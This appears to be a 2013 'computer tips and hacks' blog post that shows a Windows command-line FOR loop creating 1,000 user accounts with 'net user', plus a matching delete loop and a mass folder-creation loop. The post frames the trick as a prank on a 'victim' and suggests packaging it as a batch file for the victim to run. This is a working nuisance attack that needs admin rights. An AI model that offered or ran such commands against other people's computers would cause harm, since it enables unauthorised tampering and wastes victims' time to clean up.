Friday, 29 March 2013

How to create infinite User Accounts in Windows


Hello folks..!!
 We all know that the " net user XYZ/add " command will add new user (XYZ)  to the computer ..!!
I am  just going through a BATCH PROGRAMMING ebook .. and learned about the "FOR loop commands in batch file programming""

So, if we type in cmd (need to have administrative privilleges in windows 7/ XP/ Vista)

''' for /l %i in (1,1,1000) do net user user%i /add "

this command will add 1000 users on  the victims computer ..!!
and if he/she is a newbiee then it takes him/her a long time to remove all the users!!



don't use it on your  own PC!!

(however if u had used this trick on your own PC,then there is no need to delete each user account one by one,all you have to do is just open the command prompt with admin privileges and type in

''' for /l %i in (1,1,1000) do net user user%i /del"

this command will delete all the users created by the former command..!!


and yes you can also create a batch file for this as whensoever the victim will execute this batch file , his/her computer will be filled by thousand's of user accounts ..!!

if you are creating a batch file then u must have to declare the looping variable "i' as "%%i" instead of "%i"..


enjoy..:))

similarly u can create 100000's of folders using this for loop command..!!

"for /l %i in (1,1,1000) do md folder%i "

Hope you liked the article..!!
Don't forget to like this blog..!!

follow us on facebook : https://www.facebook.com/pages/Computer-Tips-Tricks-and-Hacks/530436196998083
join the group for more tips and tricks : https://www.facebook.com/groups/439802949391492

No comments:

Post a Comment